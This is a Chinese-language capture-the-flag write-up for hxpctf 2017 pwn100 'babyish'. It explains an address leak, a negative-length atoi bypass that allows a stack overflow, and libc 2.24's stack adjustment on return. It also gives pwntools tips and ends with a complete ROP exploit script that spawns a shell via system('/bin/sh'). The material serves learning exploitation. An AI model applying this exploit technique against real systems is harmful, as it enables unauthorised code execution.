pwntools使用技巧以及较新版本32位libc下的ROP
hxpctf 2017 pwn100 babyish
题目比较简单,但是学到了几个知识点,记录一下。
简要分析
-
checksec
vccxx1337@vccxx1337-PC:~/Desktop/ctfgame/hxpctf/babyish$ checksec vuln [*] '/home/vccxx1337/Desktop/ctfgame/hxpctf/babyish/vuln' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)开了栈不可执行,所以用栈溢出来执行shellcode没戏;
审查函数代码,发现greet函数中可以泄露栈中信息,动态调试发现栈上有一个libc地址可以泄露,因此考虑ROP -
atoi
之前一直没做出来就是卡在不知道怎么溢出。。多谢USTC的dalao指导
main函数中调用的num()函数读入我们的输入input,返回atoi(input)的值给main函数的局部变量len,之后将len和63比较,限制len小于63。
如果输入一个正数是无法溢出的,因为len作为后面read的参数限制了你的输入长度。但是如果我们输入一个负数比如-1,则可以通过这一限制,而-1在内存中存的是补码0xFFFFFFFF,这个数作为read的参数,就允许我们覆盖任意长的堆栈数据。
libc 的堆栈调整机制
观察main函数发现这个main函数的返回和之前见过的的main函数返回不太一样:
以前见过的返回普遍是直接esp-0x??然后就ret了
这个程序的main函数返回使用栈上存储的数据来调整ret之前的esp的值,也就是说,如果直接ROP,我们的junk数据中必须在ebp-0x0c这个地方布置一个栈地址,这个栈地址必须在我们可覆盖的范围内(也就是大于main函数中buf的地址)。
这样的调整机制在较新的libc中都有(这题的libc版本是2.24),这种机制的好处在于要求攻击者在rop时还泄露一个栈地址,提高了攻击难度。
很巧的是之前泄露libc地址的时候栈中就有一个符合上述条件的栈地址,因此通过在栈上布置好需要的数据,就可以开心的ROP啦。
显示libc信息的技巧
只需要
sudo chmod +x libc.so.6
./libc.so.6
即可。
pwntools技巧
看了dalao的pwn脚本学到了pwntools的使用姿势:
-
env参数
io = process("./vuln",env={'LD_PRELOAD':'./libc.so.6'})通过在process后面加参数env来指定程序使用的libc,这样就可以让程序运行在远程靶机上大致一样的环境下。对给了libc的题来说,再也不用先用自己的libc调试,成功后再转换为远程libc的地址了。
-
直接从libc中加载符号偏移
libc = ELF("./libc.so.6") setbuffer_symbol = libc.symbols["setbuffer"] system_symbol = libc.symbols["system"] -
gdb调试脚本
调payload的时候以前总是要一步步运行脚本到发送payload前的语句,现在只需要在发送payload前加上这一句:
gdb.attach(io)将会等待gdb的attach,加上pid的显示会更方便些
pid = proc.pidof(io) print pid gdb.attach(io) -
设置输出调试信息
context.log_level='debug'加上这句之后,pwntools的返回信息更加直观详细:
攻击脚本
from pwn import *
import time
#设置pwntools
io = process("./vuln",env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF("./libc.so.6")
context.log_level='debug'
#io =remote('35.198.98.140',45067)
#获取所给libc的符号偏移
setbuffer_symbol = libc.symbols["setbuffer"]
system_symbol = libc.symbols["system"]
#泄露内存中栈地址和libc地址
io.recv()
io.send("1"*16)
io.recvuntil("1"*16)
data = io.recv()[:12]
setbuff_addr = int(data[-4:][::-1].encode("hex"),16) - 0xB
stack_addr = int(data[0:4][::-1].encode("hex"),16)
system_addr = system_symbol - setbuffer_symbol + setbuff_addr
binsh_symbol = 0x0015CD48
binsh_addr = binsh_symbol - system_symbol + system_addr
print "[+] leaked setbuff addr :" + hex(setbuff_addr)
print "[+] calced system_addr :" +hex(system_addr)
print "[+] leaked stack addr:" + hex(stack_addr)
print "[+] calced binsh addr:" + hex(binsh_addr)
#发送ROP链
sleep(3)
io.sendline("-1")
payload = "j"*0x50 + p32(stack_addr) + 3*"junk"+p32(system_addr) + p32(0x080486EF) + p32(binsh_addr)
pid = proc.pidof(io)[0]
print pid
gdb.attach(io)
io.send(payload)
io.interactive()
注意时延问题。。。直接连远程的是后我是用ipython一行一行运行脚本才拿到的shell,修改sleep的秒数有时候好使。
